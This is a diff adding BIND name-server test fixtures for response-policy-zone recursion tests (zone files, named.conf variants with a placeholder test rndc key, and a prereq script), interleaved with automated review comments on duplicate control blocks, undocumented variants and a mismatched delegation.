300 604800 3600 + IN NS ns.passthru.zone. + +ns.passthru.zone. IN A 127.0.0.1 + +example.com CNAME rpz-passthru. +*.example.com CNAME rpz-passthru. diff --git a/bin/tests/system/rpzrecurse/ns2/db.wildcard1 b/bin/tests/system/rpzrecurse/ns2/db.wildcard1 new file mode 100644 index 0000000..3e5c78f --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns2/db.wildcard1 
@@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 60 +@ IN SOA root.ns ns 1996072700 3600 1800 86400 60 + NS ns +ns A 127.0.0.1 +*.test1.example.net CNAME . +test1.example.net CNAME . diff --git a/bin/tests/system/rpzrecurse/ns2/db.wildcard2a b/bin/tests/system/rpzrecurse/ns2/db.wildcard2a new file mode 100644 index 0000000..3e5c78f --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns2/db.wildcard2a @@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 60 +@ IN SOA root.ns ns 1996072700 3600 1800 86400 60 + NS ns +ns A 127.0.0.1 +*.test1.example.net CNAME . +test1.example.net CNAME . diff --git a/bin/tests/system/rpzrecurse/ns2/db.wildcard2b b/bin/tests/system/rpzrecurse/ns2/db.wildcard2b new file mode 100644 index 0000000..f8e6123 --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns2/db.wildcard2b 
@@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 60 +@ IN SOA root.ns ns 1996072700 3600 1800 86400 60 + NS ns +ns A 127.0.0.1 +*.test2.example.net CNAME . +test2.example.net CNAME . diff --git a/bin/tests/system/rpzrecurse/ns2/db.wildcard3 b/bin/tests/system/rpzrecurse/ns2/db.wildcard3 new file mode 100644 index 0000000..5354c04 --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns2/db.wildcard3 @@ -0,0 +1,16 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 60 +@ IN SOA root.ns ns 1996072700 3600 1800 86400 60 + NS ns +ns A 127.0.0.1 +*.test1.example.net CNAME . diff --git a/bin/tests/system/rpzrecurse/ns2/named.clientip.conf b/bin/tests/system/rpzrecurse/ns2/named.clientip.conf new file mode 100644 index 0000000..8df90a3 --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns2/named.clientip.conf 
@@ -0,0 +1,37 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +# common configuration +include "named.conf.header"; + +view "recursive" { + zone "." { + type hint; + file "root.hint"; + }; + + # policy configuration to be tested + response-policy { + zone "clientip1"; + zone "clientip2"; + } qname-wait-recurse no + nsdname-enable yes + nsip-enable yes; + + # policy zones to be tested + zone "clientip1" { type master; file "db.clientip1"; }; + zone "clientip2" { type master; file "db.clientip2"; }; + + recursion yes; + dnssec-validation yes; +}; diff --git a/bin/tests/system/rpzrecurse/ns2/named.clientip2.conf b/bin/tests/system/rpzrecurse/ns2/named.clientip2.conf new file mode 100644 index 0000000..8c15909 --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns2/named.clientip2.conf 
@@ -0,0 +1,37 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +# common configuration +include "named.conf.header"; + +view "recursive" { + zone "." { + type hint; + file "root.hint"; + }; + + servfail-ttl 0; + + # policy configuration to be tested + response-policy { + zone "clientip21"; + } qname-wait-recurse no + nsdname-enable yes + nsip-enable yes; + + # policy zones to be tested + zone "clientip21" { type master; file "db.clientip21"; }; + + recursion yes; + dnssec-validation yes; +}; diff --git a/bin/tests/system/rpzrecurse/ns2/named.conf.header.in b/bin/tests/system/rpzrecurse/ns2/named.conf.header.in new file mode 100644 index 0000000..77c3c6a --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns2/named.conf.header.in 
@@ -0,0 +1,41 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+controls { /* empty */ };
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ session-keyfile "session.key";
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion yes;
+ dnssec-validation yes;
+ querylog yes;
+
+ # let ns3 start dnsrpzd
+ include "../dnsrps-slave.conf";
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
diff --git a/bin/tests/system/rpzrecurse/ns2/named.default.conf b/bin/tests/system/rpzrecurse/ns2/named.default.conf
new file mode 100644
index 0000000..929b88f
--- /dev/null
+++ b/bin/tests/system/rpzrecurse/ns2/named.default.conf
@@ -0,0 +1,25 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+# common configuration
+include "named.conf.header";
+
+view "recursive" {
+ zone "." {
+ type hint;
+ file "root.hint";
+ };
+
+ recursion yes;
+ dnssec-validation yes;
+};
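Review bot: ns2/named.conf.header.in contains two `controls` statements: `controls { /* empty */ };` at the top and, after the key block, one that opens `inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; };`. Someone auditing the fixture reads "no control channel" first and only later finds it open to any source address, so the empty statement looks redundant at best and misleading at worst. I would drop the first statement, or replace `/* empty */` with a comment that says why both are needed. Because every ns2 `named.*.conf` in this commit includes this header, the file is also the natural place for a single comment marking the inline `rndc_key` secret as a test-only credential.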
diff --git a/bin/tests/system/rpzrecurse/ns2/named.invalidprefixlength.conf b/bin/tests/system/rpzrecurse/ns2/named.invalidprefixlength.conf new file mode 100644 index 0000000..c7dad28 --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns2/named.invalidprefixlength.conf @@ -0,0 +1,30 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +# common configuration +include "named.conf.header"; + +view "recursive" { + zone "." { + type hint; + file "root.hint"; + }; + + # policy configuration to be tested + response-policy { + zone "invalidprefixlength"; + }; + + # policy zones to be tested + zone "invalidprefixlength" { type master; file "db.invalidprefixlength"; }; +}; diff --git a/bin/tests/system/rpzrecurse/ns2/named.log.conf b/bin/tests/system/rpzrecurse/ns2/named.log.conf new file mode 100644 index 0000000..c3b4df6 --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns2/named.log.conf 
@@ -0,0 +1,39 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +# common configuration +include "named.conf.header"; + +view "recursive" { + zone "." { + type hint; + file "root.hint"; + }; + + # policy configuration to be tested + response-policy { + zone "log1" log no; + zone "log2" log yes; + zone "log3"; # missing log clause + } qname-wait-recurse no + nsdname-enable yes + nsip-enable yes; + + # policy zones to be tested + zone "log1" { type master; file "db.log1"; }; + zone "log2" { type master; file "db.log2"; }; + zone "log3" { type master; file "db.log3"; }; + + recursion yes; + dnssec-validation yes; +}; diff --git a/bin/tests/system/rpzrecurse/ns2/named.max.conf b/bin/tests/system/rpzrecurse/ns2/named.max.conf new file mode 100644 index 0000000..5b9f8a2 --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns2/named.max.conf 
@@ -0,0 +1,161 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +# common configuration +include "named.conf.header"; + +view "recursive" { + zone "." { + type hint; + file "root.hint"; + }; + + # policy configuration to be tested + response-policy { + zone "max1"; + zone "max2"; + zone "max3"; + zone "max4"; + zone "max5"; + zone "max6"; + zone "max7"; + zone "max8"; + zone "max9"; + zone "max10"; + zone "max11"; + zone "max12"; + zone "max13"; + zone "max14"; + zone "max15"; + zone "max16"; + zone "max17"; + zone "max18"; + zone "max19"; + zone "max20"; + zone "max21"; + zone "max22"; + zone "max23"; + zone "max24"; + zone "max25"; + zone "max26"; + zone "max27"; + zone "max28"; + zone "max29"; + zone "max30"; + zone "max31"; + zone "max32"; + zone "max33"; + zone "max34"; + zone "max35"; + zone "max36"; + zone "max37"; + zone "max38"; + zone "max39"; + zone "max40"; + zone "max41"; + zone "max42"; + zone "max43"; + zone "max44"; + zone "max45"; + zone "max46"; + zone "max47"; + zone "max48"; + zone "max49"; + zone "max50"; + zone "max51"; + zone "max52"; + zone "max53"; + zone "max54"; + zone "max55"; + zone "max56"; + zone "max57"; + zone "max58"; + zone "max59"; + zone "max60"; + zone "max61"; + zone "max62"; + zone "max63"; + zone "max64"; + } qname-wait-recurse no + nsdname-enable yes + nsip-enable yes; + + # policy zones to be tested + zone "max1" { type master; file "db.max1.local"; }; + zone "max2" { type master; file "db.max2.local"; }; + zone "max3" { type master; file "db.max3.local"; }; + zone "max4" { type master; file "db.max4.local"; }; + zone "max5" { type 
master; file "db.max5.local"; }; + zone "max6" { type master; file "db.max6.local"; }; + zone "max7" { type master; file "db.max7.local"; }; + zone "max8" { type master; file "db.max8.local"; }; + zone "max9" { type master; file "db.max9.local"; }; + zone "max10" { type master; file "db.max10.local"; }; + zone "max11" { type master; file "db.max11.local"; }; + zone "max12" { type master; file "db.max12.local"; }; + zone "max13" { type master; file "db.max13.local"; }; + zone "max14" { type master; file "db.max14.local"; }; + zone "max15" { type master; file "db.max15.local"; }; + zone "max16" { type master; file "db.max16.local"; }; + zone "max17" { type master; file "db.max17.local"; }; + zone "max18" { type master; file "db.max18.local"; }; + zone "max19" { type master; file "db.max19.local"; }; + zone "max20" { type master; file "db.max20.local"; }; + zone "max21" { type master; file "db.max21.local"; }; + zone "max22" { type master; file "db.max22.local"; }; + zone "max23" { type master; file "db.max23.local"; }; + zone "max24" { type master; file "db.max24.local"; }; + zone "max25" { type master; file "db.max25.local"; }; + zone "max26" { type master; file "db.max26.local"; }; + zone "max27" { type master; file "db.max27.local"; }; + zone "max28" { type master; file "db.max28.local"; }; + zone "max29" { type master; file "db.max29.local"; }; + zone "max30" { type master; file "db.max30.local"; }; + zone "max31" { type master; file "db.max31.local"; }; + zone "max32" { type master; file "db.max32.local"; }; + zone "max33" { type master; file "db.max33.local"; }; + zone "max34" { type master; file "db.max34.local"; }; + zone "max35" { type master; file "db.max35.local"; }; + zone "max36" { type master; file "db.max36.local"; }; + zone "max37" { type master; file "db.max37.local"; }; + zone "max38" { type master; file "db.max38.local"; }; + zone "max39" { type master; file "db.max39.local"; }; + zone "max40" { type master; file "db.max40.local"; }; + zone "max41" 
{ type master; file "db.max41.local"; }; + zone "max42" { type master; file "db.max42.local"; }; + zone "max43" { type master; file "db.max43.local"; }; + zone "max44" { type master; file "db.max44.local"; }; + zone "max45" { type master; file "db.max45.local"; }; + zone "max46" { type master; file "db.max46.local"; }; + zone "max47" { type master; file "db.max47.local"; }; + zone "max48" { type master; file "db.max48.local"; }; + zone "max49" { type master; file "db.max49.local"; }; + zone "max50" { type master; file "db.max50.local"; }; + zone "max51" { type master; file "db.max51.local"; }; + zone "max52" { type master; file "db.max52.local"; }; + zone "max53" { type master; file "db.max53.local"; }; + zone "max54" { type master; file "db.max54.local"; }; + zone "max55" { type master; file "db.max55.local"; }; + zone "max56" { type master; file "db.max56.local"; }; + zone "max57" { type master; file "db.max57.local"; }; + zone "max58" { type master; file "db.max58.local"; }; + zone "max59" { type master; file "db.max59.local"; }; + zone "max60" { type master; file "db.max60.local"; }; + zone "max61" { type master; file "db.max61.local"; }; + zone "max62" { type master; file "db.max62.local"; }; + zone "max63" { type master; file "db.max63.local"; }; + zone "max64" { type master; file "db.max64.local"; }; + + recursion yes; + dnssec-validation yes; +}; diff --git a/bin/tests/system/rpzrecurse/ns2/named.wildcard1.conf b/bin/tests/system/rpzrecurse/ns2/named.wildcard1.conf new file mode 100644 index 0000000..f9e205d --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns2/named.wildcard1.conf 
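Review bot: The 64 `zone "maxN"` entries in ns2/named.max.conf point at `db.maxN.local` files that are not added in the visible part of this commit, and nothing explains why the count is 64. clean.sh removes `ns2/*.local`, so these files are presumably generated at setup time, but the config itself does not say so. A comment above `response-policy` such as `# 64 policy zones, presumably the supported maximum; db.max*.local are generated by the test setup, not checked in` would tell a reader what limit is being exercised. Both the limit and the generation step are assumptions from this hunk alone and should be confirmed against the setup script before wording the comment.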
@@ -0,0 +1,35 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +# common configuration +include "named.conf.header"; + +view "recursive" { + zone "." { + type hint; + file "root.hint"; + }; + + # policy configuration to be tested + response-policy { + zone "wildcard1" policy NXDOMAIN; + } qname-wait-recurse yes + nsdname-enable yes + nsip-enable yes; + + # policy zones to be tested + zone "wildcard1" { type master; file "db.wildcard1"; }; + + recursion yes; + dnssec-validation yes; +}; diff --git a/bin/tests/system/rpzrecurse/ns2/named.wildcard2.conf b/bin/tests/system/rpzrecurse/ns2/named.wildcard2.conf new file mode 100644 index 0000000..31d05c6 --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns2/named.wildcard2.conf 
@@ -0,0 +1,37 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +# common configuration +include "named.conf.header"; + +view "recursive" { + zone "." { + type hint; + file "root.hint"; + }; + + # policy configuration to be tested + response-policy { + zone "wildcard2a" policy NXDOMAIN; + zone "wildcard2b" policy NXDOMAIN; + } qname-wait-recurse yes + nsdname-enable yes + nsip-enable yes; + + # policy zones to be tested + zone "wildcard2a" { type master; file "db.wildcard2a"; }; + zone "wildcard2b" { type master; file "db.wildcard2b"; }; + + recursion yes; + dnssec-validation yes; +}; diff --git a/bin/tests/system/rpzrecurse/ns2/named.wildcard3.conf b/bin/tests/system/rpzrecurse/ns2/named.wildcard3.conf new file mode 100644 index 0000000..7164d70 --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns2/named.wildcard3.conf 
@@ -0,0 +1,35 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +# common configuration +include "named.conf.header"; + +view "recursive" { + zone "." { + type hint; + file "root.hint"; + }; + + # policy configuration to be tested + response-policy { + zone "wildcard3" policy NXDOMAIN; + } qname-wait-recurse yes + nsdname-enable yes + nsip-enable yes; + + # policy zones to be tested + zone "wildcard3" { type master; file "db.wildcard3"; }; + + recursion yes; + dnssec-validation yes; +}; diff --git a/bin/tests/system/rpzrecurse/ns2/named.wildcard4.conf b/bin/tests/system/rpzrecurse/ns2/named.wildcard4.conf new file mode 100644 index 0000000..b6a76d0 --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns2/named.wildcard4.conf 
@@ -0,0 +1,37 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+# common configuration
+include "named.conf.header";
+
+view "recursive" {
+ # policy configuration to be tested
+ response-policy {
+ zone "passthru.zone" policy passthru;
+ zone "given.zone" policy given;
+ } qname-wait-recurse yes
+ nsdname-enable yes
+ nsip-enable yes;
+
+ # policy zones to be tested
+ zone "passthru.zone" { type master; file "db.passthru"; };
+ zone "given.zone" { type master; file "db.given"; };
+
+ zone "." {
+ type hint;
+ file "root.hint";
+ };
+
+ recursion yes;
+ dnssec-validation yes;
+};
diff --git a/bin/tests/system/rpzrecurse/ns2/root.hint b/bin/tests/system/rpzrecurse/ns2/root.hint
new file mode 100644
index 0000000..ced47f3
--- /dev/null
+++ b/bin/tests/system/rpzrecurse/ns2/root.hint
@@ -0,0 +1,14 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 999999
+. IN NS ns.example.
+ns.example. IN A 10.53.0.1
diff --git a/bin/tests/system/rpzrecurse/ns3/example.db b/bin/tests/system/rpzrecurse/ns3/example.db
new file mode 100644
index 0000000..201a174
--- /dev/null
+++ b/bin/tests/system/rpzrecurse/ns3/example.db
@@ -0,0 +1,17 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 0
+@ SOA . . 0 0 0 0 0
+@ NS ns
+ns A 10.53.0.3
+child NS ns.child
+ns.child A 10.53.0.4
diff --git a/bin/tests/system/rpzrecurse/ns3/named1.conf.in b/bin/tests/system/rpzrecurse/ns3/named1.conf.in
new file mode 100644
index 0000000..1a56066
--- /dev/null
+++ b/bin/tests/system/rpzrecurse/ns3/named1.conf.in
@@ -0,0 +1,43 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+include "../../common/rndc.key";
+
+controls {
+ inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ query-source address 10.53.0.3;
+ notify-source 10.53.0.3;
+ transfer-source 10.53.0.3;
+ port @PORT@;
+ session-keyfile "session.key";
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ recursion yes;
+ dnssec-validation yes;
+ response-policy { zone "policy"; }
+ qname-wait-recurse yes
+ nsip-enable yes
+ nsdname-enable yes;
+
+ include "../dnsrps.conf";
+};
+
+zone "policy" { type master; file "policy.db"; };
+
+zone "example.tld" { type master; file "example.db"; };
+
+zone "." { type master; file "root.db"; };
diff --git a/bin/tests/system/rpzrecurse/ns3/named2.conf.in b/bin/tests/system/rpzrecurse/ns3/named2.conf.in
new file mode 100644
index 0000000..b5370bf
--- /dev/null
+++ b/bin/tests/system/rpzrecurse/ns3/named2.conf.in
@@ -0,0 +1,42 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+include "../../common/rndc.key";
+
+controls {
+ inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ query-source address 10.53.0.3;
+ notify-source 10.53.0.3;
+ transfer-source 10.53.0.3;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ recursion yes;
+ dnssec-validation yes;
+ response-policy { zone "policy"; } nsip-wait-recurse no
+ qname-wait-recurse yes
+ nsip-enable yes
+ nsdname-enable yes;
+
+ include "../dnsrps.conf";
+};
+
+zone "policy" { type master; file "policy.db"; };
+
+zone "example.tld" { type master; file "example.db"; };
+
+zone "." { type master; file "root.db"; };
diff --git a/bin/tests/system/rpzrecurse/ns3/policy.db b/bin/tests/system/rpzrecurse/ns3/policy.db
new file mode 100644
index 0000000..526d75c
--- /dev/null
+++ b/bin/tests/system/rpzrecurse/ns3/policy.db
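Review bot: Nothing in ns3/named2.conf.in says why it exists next to named1.conf.in. The two files differ only in the added `nsip-wait-recurse no` on the `response-policy` line and in `session-keyfile "session.key";`, which named1.conf.in sets and this file omits. A header comment such as `/* variant of named1.conf.in with nsip-wait-recurse disabled; copied over named.conf by tests.sh for the timing comparison */` would make the intent clear. If dropping `session-keyfile` was not deliberate, restoring it keeps the two variants identical apart from the option under test.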
@@ -0,0 +1,15 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 0
+@ SOA . . 0 0 0 0 0
+@ NS .
+32.100.0.53.10.rpz-nsip CNAME .
diff --git a/bin/tests/system/rpzrecurse/ns3/root.db b/bin/tests/system/rpzrecurse/ns3/root.db
new file mode 100644
index 0000000..665953d
--- /dev/null
+++ b/bin/tests/system/rpzrecurse/ns3/root.db
@@ -0,0 +1,17 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 0
+@ SOA . . 0 0 0 0 0
+@ NS ns
+ns A 10.53.0.3
+foo NS foo.ns5
+ns5.foo A 10.53.0.5
diff --git a/bin/tests/system/rpzrecurse/ns4/child.example.db b/bin/tests/system/rpzrecurse/ns4/child.example.db
new file mode 100644
index 0000000..47a90fb
--- /dev/null
+++ b/bin/tests/system/rpzrecurse/ns4/child.example.db
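Review bot: The delegation for `foo` in ns3/root.db does not match its address record: the NS target is `foo.ns5` while the A record is for `ns5.foo`, so the zone carries no address for the name server it names. If this is deliberate (the nsip-wait-recurse timing check in tests.sh may depend on a slow name-server address lookup, though that is an inference), a comment such as `; NS target intentionally has no matching A record` would stop a later cleanup from "fixing" it; if it is not deliberate, the two names should agree. ns4/child.example.db in this commit has a similar oddity, listing `foo NS ns.foo` and `foo NS ns.foo.` side by side, and would benefit from the same kind of comment.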
@@ -0,0 +1,18 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 0
+@ SOA . . 0 0 0 0 0
+@ NS ns
+ns A 10.53.0.4
+foo NS ns.foo
+foo NS ns.foo.
+ns.foo A 10.53.0.5
diff --git a/bin/tests/system/rpzrecurse/ns4/named.conf.in b/bin/tests/system/rpzrecurse/ns4/named.conf.in
new file mode 100644
index 0000000..372f5ad
--- /dev/null
+++ b/bin/tests/system/rpzrecurse/ns4/named.conf.in
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+controls { /* empty */ };
+
+options {
+ query-source address 10.53.0.4;
+ notify-source 10.53.0.4;
+ transfer-source 10.53.0.4;
+ port @PORT@;
+ session-keyfile "session.key";
+ pid-file "named.pid";
+ listen-on { 10.53.0.4; };
+ listen-on-v6 { none; };
+ recursion no;
+ dnssec-validation no;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "child.example.tld" { type master; file "child.example.db"; };
diff --git a/bin/tests/system/rpzrecurse/prereq.sh b/bin/tests/system/rpzrecurse/prereq.sh
new file mode 100644
index 0000000..b30cb41
--- /dev/null
+++ b/bin/tests/system/rpzrecurse/prereq.sh
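Review bot: ns4/named.conf.in declares `controls` twice, first as `controls { /* empty */ };` and again at the bottom with an `inet` listener, so the file says both that the control channel is off and that it is on; keeping only the second block removes the contradiction. The rndc key is also written inline (`secret "1234abcd8765";`) where the ns3 configs in this commit use `include "../../common/rndc.key";`. Assuming that shared file defines the same `rndc_key`, including it here would keep the secret in one place. Because the listener uses `allow { any; }` (as do ns3/named1.conf.in and ns3/named2.conf.in), that fixed key is the only protection on the channel, so a comment marking it as a test-only key that must not be reused outside the 10.53.0.x test addresses is worth adding.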
@@ -0,0 +1,25 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+if $PERL -e 'use Net::DNS;' 2>/dev/null
+then
+ :
+else
+ echo_i "This test requires the Net::DNS library." >&2
+ exit 1
+fi
+
+exit 0
diff --git a/bin/tests/system/rpzrecurse/setup.sh b/bin/tests/system/rpzrecurse/setup.sh
new file mode 100644
